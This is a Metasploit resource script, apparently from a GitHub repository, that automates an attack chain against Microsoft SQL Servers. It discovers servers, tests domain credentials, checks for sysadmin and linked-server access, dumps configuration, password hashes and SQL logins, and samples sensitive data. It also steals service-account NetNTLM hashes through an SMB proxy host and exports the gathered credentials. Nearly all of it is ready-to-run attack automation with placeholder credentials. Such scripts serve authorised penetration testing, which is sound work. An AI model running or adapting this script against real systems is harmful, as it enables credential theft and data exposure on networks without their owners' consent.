-
Notifications
You must be signed in to change notification settings - Fork 6
/
sql.rc
189 lines (160 loc) · 4.76 KB
/
sql.rc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
#---------------------------------
# Start logging
#---------------------------------
spool /tmp/msf-sql.log
#---------------------------------
# Setup global vars - UPDATE THIS
#---------------------------------
setg USERNAME User1
setg PASSWORD Password1
setg DOMAIN acme.com
setg USE_WINDOWS_AUTHENT true
setg SMBPROXY 10.0.0.230
#---------------------------------
# Identify live SQL Servers - UPDATE THIS
#---------------------------------
use auxiliary/scanner/mssql/mssql_ping
set rhosts file:///pentest/sql.txt
set threads 50
exploit
#---------------------------------
# Test access with domain creds
#---------------------------------
use auxiliary/scanner/mssql/mssql_login
set VERBOSE false
set THREADS 50
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOSTS #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# Test for sysadmin access
#---------------------------------
use auxiliary/admin/mssql/mssql_sql
set VERBOSE false
set THREADS 50
set sql select \'server: \' + @@servername + \',sysadmin: \' + cast(IS_SRVROLEMEMBER(\'sysadmin\') as varchar(10)) + \',links: \' + (select cast((select count(srvname) from master..sysservers) as varchar(10))) + \',clustered: \' + (select cast(SERVERPROPERTY(\'IsClustered\') as varchar(10))) as OUTPUT
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOST #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# List accessible databases
#---------------------------------
use auxiliary/admin/mssql/mssql_sql
set VERBOSE false
set THREADS 50
set sql select name from master..sysdatabases where has_dbaccess(name)=1
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOST #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# Dump accessible config info
#---------------------------------
use auxiliary/admin/mssql/mssql_enum
set VERBOSE false
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOST #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# Dump password hashes if possible
#---------------------------------
use auxiliary/scanner/mssql/mssql_hashdump
set VERBOSE false
set THREADS 1
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOSTS #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# Dump all of the SQL logins
#---------------------------------
use auxiliary/admin/mssql/mssql_enum_sql_logins
set FuzzNum 500
set VERBOSE false
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOST #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#---------------------------------
# Dump sample of senstitve data
#---------------------------------
use auxiliary/admin/mssql/mssql_findandsampledata
set SAMPLE_SIZE 5
set VERBOSE true
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOSTS #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#----------------------------------------
# Capture service account NetNTLM hashes
#----------------------------------------
use auxiliary/admin/mssql/mssql_ntlm_stealer
set VERBOSE false
set THREADS 50
<ruby>
framework.db.hosts.each do |host|
host.services.each do |service|
if service.name == "mssql" and service.state == "open"
self.run_single("set RHOSTS #{host.address}")
self.run_single("set RPORT #{service.port}")
self.run_single("run")
end
end
end
</ruby>
#----------------------------------------
# Export list
#----------------------------------------
creds -o /tmp/msf-creds.csv